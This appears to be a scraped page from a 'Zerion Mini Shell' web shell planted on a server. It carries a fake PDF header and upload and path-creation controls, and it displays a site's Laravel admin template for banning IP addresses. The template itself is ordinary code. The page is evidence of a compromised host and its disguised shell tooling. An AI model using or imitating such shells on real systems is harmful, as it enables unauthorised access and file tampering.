%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/paste.varak.net-5.6/app/storage/views/
Upload File :
Create Path :
Current File : /www/varak.net/paste.varak.net-5.6/app/storage/views/8d170a7161afad45fe03e56d7e8c187b

<?php $__env->startSection('module'); ?>
	<section id="admin-ban">
		<fieldset>
			<legend><?php echo Lang::get('admin.ban_an_ip'); ?></legend>

			<?php echo Form::open(array(
					'autocomplete'   => 'off',
					'role'           => 'form'
				)); ?>


			<div class="row">
				<div class="col-sm-12 form-inline">
					<?php echo Form::text('ip', NULL, array(
							'class'         => 'form-control',
							'placeholder'   => Lang::get('admin.ip_address')
						)); ?>


					<?php echo Form::submit(Lang::get('admin.ban'), array(
							'class'   => 'btn btn-primary'
						)); ?>

				</div>
			</div>
			<br />

			<?php echo Form::close(); ?>


			<div class="row">
				<div class="col-sm-12">
					<?php if($bans->count() > 0): ?>
						<table class="table table-striped table-striped-dark">
							<colgroup>
								<col class="col-sm-11" />
								<col class="col-sm-1" />
							</colgroup>

							<thead>
								<tr>
									<th><?php echo Lang::get('admin.ip_address'); ?></th>
									<th></th>
								</tr>
							</thead>

							<tbody>
								<?php foreach($bans as $ban): ?>
									<tr>
										<td><?php echo $ban->ip; ?></td>

										<td class="text-center">
											<?php echo link_to('admin/ban/remove/'.urlencode($ban->ip), Lang::get('admin.unban')); ?>

										</td>
									</tr>
								<?php endforeach; ?>
							</tbody>
						</table>
					<?php else: ?>
						<div class="jumbotron text-center">
							<h1><span class="glyphicon glyphicon-info-sign text-info"></span></h1>
							<h2><?php echo Lang::get('admin.no_banned_ip'); ?></h2>
						</div>
					<?php endif; ?>
				</div>
			</div>
		</fieldset>
	</section>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('skins.bootstrap.admin.layout', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Zerion Mini Shell 1.0